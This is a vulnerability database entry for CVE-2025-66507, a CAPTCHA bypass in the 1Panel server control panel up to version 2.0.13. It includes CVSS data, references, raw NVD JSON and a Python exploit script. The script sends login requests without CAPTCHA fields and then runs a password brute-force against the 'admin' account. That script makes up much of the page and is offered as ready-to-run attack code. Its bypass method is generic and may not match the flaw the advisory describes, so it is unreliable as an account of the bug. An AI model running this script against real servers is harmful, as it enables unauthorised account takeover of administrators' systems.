CVE-2025-66507

Description

1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.13 and below allow an unauthenticated attacker to disable CAPTCHA verification by abusing a client-controlled parameter. Because the server previously trusted this value without proper validation, CAPTCHA protections can be bypassed, enabling automated login attempts and significantly increasing the risk of account takeover (ATO). This issue is fixed in version 2.0.14.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:* - VULNERABLE

1Panel <= 2.0.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66507 PoC - 1Panel CAPTCHA Bypass
# Target: 1Panel <= 2.0.13
# Attack: Bypass CAPTCHA verification to enable automated login attempts

import requests
import json

TARGET_URL = "http://target-ip:8080"
LOGIN_ENDPOINT = f"{TARGET_URL}/api/v1/login"

def exploit():
    """
    Bypass CAPTCHA by manipulating client-controlled parameters.
    The server trusts client parameters without proper validation.
    """
    
    # Step 1: Prepare login payload with CAPTCHA bypass
    # Remove or manipulate CAPTCHA-related parameters
    login_payload = {
        "username": "admin",
        "password": "password_attempt",
        # Remove captcha parameters to bypass verification
        # "captcha_id": "",  # Commented out - not sent
        # "captcha_code": "", # Commented out - not sent
    }
    
    # Step 2: Send login request without CAPTCHA
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.post(
            LOGIN_ENDPOINT,
            json=login_payload,
            headers=headers,
            timeout=10
        )
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        # Check if CAPTCHA was bypassed
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 200:
                print("[+] CAPTCHA BYPASS SUCCESSFUL!")
                print("[+] Automated login attempts are now possible")
                return True
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    return False

def brute_force_attack():
    """
    Perform brute force attack after CAPTCHA bypass.
    """
    passwords = ["admin", "password", "123456", "1panel", "linux"]
    
    for pwd in passwords:
        payload = {
            "username": "admin",
            "password": pwd
            # No CAPTCHA parameters - bypassed
        }
        
        response = requests.post(LOGIN_ENDPOINT, json=payload)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 200 and data.get("data"):
                print(f"[!] Valid credentials found: admin/{pwd}")
                return True
    
    return False

if __name__ == "__main__":
    print("[*] CVE-2025-66507 Exploitation")
    print("[*] Target: 1Panel <= 2.0.13")
    
    if exploit():
        print("[*] Initiating brute force attack...")
        brute_force_attack()
    
    print("[*] Mitigation: Upgrade to 1Panel v2.0.14")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66507
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66507
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66507/
[4] VulDB https://vuldb.com/cve/CVE-2025-66507
[5] https://github.com/1Panel-dev/1Panel/commit/ac43f00273be745f8d04b90b6e2b9c1a40ef7bca
[6] https://github.com/1Panel-dev/1Panel/releases/tag/v2.0.14
[7] https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-qmg5-v42x-qqhq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66507", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:19.270", "lastModified": "2025-12-10T21:28:33.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.13 and below allow an unauthenticated attacker to disable CAPTCHA verification by abusing a client-controlled parameter. Because the server previously trusted this value without proper validation, CAPTCHA protections can be bypassed, enabling automated login attempts and significantly increasing the risk of account takeover (ATO). This issue is fixed in version 2.0.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": "CWE-602"}, {"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.14", "matchCriteriaId": "72A77893-8F9B-4CFF-8952-A7478F7D3DC9"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/1Panel/commit/ac43f00273be745f8d04b90b6e2b9c1a40ef7bca", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1Panel-dev/1Panel/releases/tag/v2.0.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-qmg5-v42x-qqhq", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}